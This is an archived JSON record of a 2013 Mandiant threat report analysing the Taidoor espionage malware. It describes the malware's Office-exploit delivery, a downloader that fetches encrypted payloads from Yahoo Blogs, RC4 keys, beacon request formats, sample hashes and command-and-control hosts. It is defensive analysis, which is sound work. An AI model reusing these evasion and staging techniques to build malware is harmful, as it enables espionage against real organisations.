{ "id": "9888072d-94a7-4cc7-9589-6cd2c5872d72", "created_at": "2026-04-06T00:16:17.645289Z", "updated_at": "2026-04-10T13:11:52.193651Z", "deleted_at": null, "sha1_hash": "377e9928f860f55d873ff6276e6d406860c202a2", "title": "Evasive Tactics: Taidoor | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1689955, "plain_text": "Evasive Tactics: Taidoor | Mandiant\r\nBy Mandiant\r\nPublished: 2013-09-06 · Archived: 2026-04-02 11:28:22 UTC\r\nWritten by: Nart Villeneuve, Thoufique Haq, Ned Moran\r\nThe Taidoor malware has been used in many ongoing cyber espionage campaigns. Its victims include government\r\nagencies, corporate entities, and think tanks, especially those with interests in Taiwan. [1] In a typical attack,\r\ntargets receive a spear-phishing email which encourages them to open an attached file. If opened on a vulnerable\r\nsystem, malware is silently installed on the target’s computer while a decoy document with legitimate content is\r\nopened that is intended to alleviate any suspicions the target may have. Taidoor has been successfully\r\ncompromising targets since 2008, and continues to be active today.\r\nDespite being around for a long time – and quite well known – Taidoor is a constantly evolving, persistent threat.\r\nWe observed significant tactical changes in 2011 and 2012, when the malicious email attachments did not drop the\r\nTaidoor malware directly, but instead dropped a “downloader” that then grabbed the traditional Taidoor malware\r\nfrom the Internet. [2]\r\nRecently, we observed a new variant of Taidoor, which was used in targeted attacks. It has evolved in two ways.\r\nInstead of downloading the traditional Taidoor malware from a command-and-control (CnC) server, the\r\n“downloader” reaches out to Yahoo Blogs and retrieves encrypted text from blog posts. When decrypted by the\r\n“downloader”, this text is actually a modified version of the traditional Taidoor malware. This new version of\r\nTaidoor maintains similar behavior, but has been changed enough to avoid common network detection signatures.\r\nTraditional Taidoor Malware\r\nThe Taidoor malware is traditionally delivered as an email attachment. If opened, the Taidoor malware is dropped\r\nonto the target’s system, and starts to beacon to a CnC server. Taidoor connects to its CnCs using HTTP, and the\r\n“GET” request has been consistent since 2008. It follows a simple pattern:\r\nGET /[5 characters].php?id=[6 numbers][12 characters/numbers]\r\nThe last set of 12 characters is actually the encrypted MAC address of the compromised computer. The values of\r\nthe MAC address are incremented by 1, and this is used as an RC4 key to encrypt the data that is passed between\r\nthe compromised computer and its CnC server.\r\nThe New Taidoor\r\nIn the past, other APT campaigns have used blog hosting platforms as a mechanism to transmit CnC server\r\ninformation to compromised targets. [3] Attackers using Taidoor have leveraged this model as well.\r\nhttps://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html\r\nPage 1 of 8\n\nWe analyzed a sample (be1d972819e0c5bf80bf1691cc563400) that when opened exploits a vulnerability in\r\nMicrosoft Office (CVE-2012-0158) to drop malware on the target’s computer.\r\nThe decoy document contains background information on trade liberalization between the People’s Republic of\r\nChina (PRC) and Taiwan.\r\nThe various strings in the file are XOR-encoded with the key \"0x02\" or \"0x03\".\r\nThis malware is a simple “downloader” that, instead of connecting to a CnC server, connects to a Yahoo Blog and\r\ndownloads the contents of a blog post.\r\nGET /jw!JRkdqkKGAh6MPj9MlwbK6iMgScE- HTTP/1.1\r\nhttps://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html\r\nPage 2 of 8\n\nAccept: /\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET\r\nCLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)\r\nAccept-Encoding: gzip, deflate\r\nHost: tw.myblog.yahoo.com\r\nConnection: Keep-Alive\r\nThe content of the blog post between the markers “ctxugfbyyxyyyxyy” and “yxyyyxyyctxugfby” is encoded with\r\nbase64 and encrypted using the RC4 cipher. The encryption key, which we discovered to be \"asdfasdf\", is also\r\npresent in the contents of the base64 blog data in an encrypted form. The decrypted content of the blog post is a\r\nDLL file – that is in fact the Taidoor malware.\r\nhttps://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html\r\nPage 3 of 8\n\nAfter the first-stage dropper downloads and decrypts the Taidoor malware, it then begins to connect to two CnC\r\nservers: roudan.serveftp.com (69.95.218.31) and mac.gov.hpc.tw (120.50.40.145). However, the network traffic\r\n(its “callback”) has been modified from the traditional version.\r\nGET /default.jsp?vx=vsutnh191138F9744C HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET\r\nCLR 3.0.4506.2152; .NET CLR 3.5.30729)\r\nHost: mac.gov.hpc.tw:443\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nRather than having “[five characters].php”, this new file path ends in “.jsp” and may have any of the following file\r\nnames:\r\nprocess\r\npage\r\ndefault\r\nindex\r\nuser\r\nparse\r\nabout\r\nsecurity\r\nquery\r\nlogin\r\nThe new format is:\r\n/[file name].jsp?[2 random characters]=[6 random characters][encrypted MAC address]\r\nhttps://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html\r\nPage 4 of 8\n\nIn addition to the use of other malicious Word documents (b0fd4d5fb6d8acb1ccfb54d53c08f11f), we have also\r\nseen this new Taidoor variant distributed as a Windows ScreenSaver file (.scr) posing as a PDF\r\n(d9940a3da42eb2bb8e19a84235d86e91) or a Word document (c4de3fea790f8ff6452016db5d7aa33f).\r\nIt remains unclear whether all of this Taidoor activity is related or different groups are using the same malware for\r\ndifferent purposes. The fact that Taidoor is not off-the-shelf malware that can simply be downloaded or purchased\r\nin the cybercrime underground suggests that all of this activity may be connected in some way.\r\nhttps://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html\r\nPage 5 of 8\n\nSo far, we have found only one large cluster of activity associated with this new Taidoor variant. This cluster,\r\nwhich made use of Yahoo Blogs, appears to have targeted entities in Taiwan. We found that traditional versions of\r\nTaidoor have also been using this infrastructure. [4]\r\nMalware Connections\r\nWe found that another, possibly related, malware family known as “Taleret” is using the same technique that this\r\nTaidoor variant has used. We found that samples (such as 6cd1bf0e8adcc7208b82e1506efdba8d,\r\n525fd346b9511a84bbe26eb47b845d89 and 5c887a31fb4713e17c5dda9d78aab9fe) connect to Yahoo Blogs in\r\norder to retrieve a list of CnC servers.\r\nThe content between the two markers “XXXXX” is encoded with base64 and encrypted with the RC4 cipher. The\r\nencryption key is “c37f12a0” in hex, and hardcoded in the malware.\r\nhttps://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html\r\nPage 6 of 8\n\nWe extracted the following CnC servers from these blog posts:\r\nopp.gov.taiwans.tw\r\nnscnet.gov.medicare.tw\r\nmac.gov.skies.tw\r\nklserver.servehttp.com\r\nkllserver.serveftp.com\r\n202.142.153.154\r\n80.149.239.139\r\n202.142.172.131\r\nwww.facebook.trickip.NET\r\nwww.braintrust.AlmostMy.COM\r\nAs with Taidoor, there appears to be a frequent association with Taiwan, in addition to a similar CnC naming\r\nscheme – such as mac.gov.hpc.tw (Taidoor) and mac.gov.skies.tw (Taleret).\r\nhttps://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html\r\nPage 7 of 8\n\nConclusion\r\nThe Taidoor malware has been used to successfully compromise targets since 2008. This threat has evolved over\r\ntime, and has recently leveraged Yahoo Blogs as a mechanism to drop the Taidoor malware as a “second stage”\r\ncomponent. In addition, the well-known Taidoor network traffic pattern has been modified, likely as a new way to\r\navoid network-based detection.\r\nNotes\r\n1. http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/trojan_taidoor-targeting_think_tanks.pdf\r\n2. http://blog.trendmicro.com/trendlabs-security-intelligence/taidoor-update-taidoor-gang-tags-its-victims/\r\nand http://about-threats.trendmicro.com/us/spam/222/A%20Malware%20Treat%20this%20Halloween\r\n3. http://www.nartv.org/mirror/shadows-in-the-cloud.pdf and reports of associated malware here\r\nhttp://www.welivesecurity.com/2013/05/23/syndicasec-in-the-sin-bin/ and here\r\nhttp://www.cybersquared.com/apt_targetedattacks_within_socialmedia/\r\n4. MD5 hashes of traditional Taidoor samples 811aae1a66f6a2722849333293cbf9cd\r\n454c9960e89d02e4922245efb8ef6b49 5efc35315e87fdc67dada06fb700a8c7\r\nbc69a262bcd418d194ce2aac7da47286\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html\r\nhttps://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html" ], "report_names": [ "evasive-tactics-taidoor-3.html" ], "threat_actors": [ { "id": "71b19e59-b5f7-4bc6-816d-194be0f02af0", "created_at": "2022-10-25T16:07:24.301036Z", "updated_at": "2026-04-10T02:00:04.928222Z", "deleted_at": null, "main_name": "Taidoor", "aliases": [ "Budminer", "Earth Aughisky", "G0015" ], "source_name": "ETDA:Taidoor", "tools": [ "Dripion", "Masson", "Taidoor", "simbot" ], "source_id": "ETDA", "reports": null }, { "id": "50bd4a6c-7542-4bdd-8b37-ab468fc428ef", "created_at": "2023-01-06T13:46:38.998658Z", "updated_at": "2026-04-10T02:00:03.176186Z", "deleted_at": null, "main_name": "Taidoor", "aliases": [ "G0015", "Earth Aughisky" ], "source_name": "MISPGALAXY:Taidoor", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "478e9b27-39b9-49e4-a3c5-81569a767275", "created_at": "2022-10-25T15:50:23.417339Z", "updated_at": "2026-04-10T02:00:05.41593Z", "deleted_at": null, "main_name": "Taidoor", "aliases": [ "Taidoor" ], "source_name": "MITRE:Taidoor", "tools": null, "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434577, "ts_updated_at": 1775826712, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/377e9928f860f55d873ff6276e6d406860c202a2.pdf", "text": "https://archive.orkl.eu/377e9928f860f55d873ff6276e6d406860c202a2.txt", "img": "https://archive.orkl.eu/377e9928f860f55d873ff6276e6d406860c202a2.jpg" } }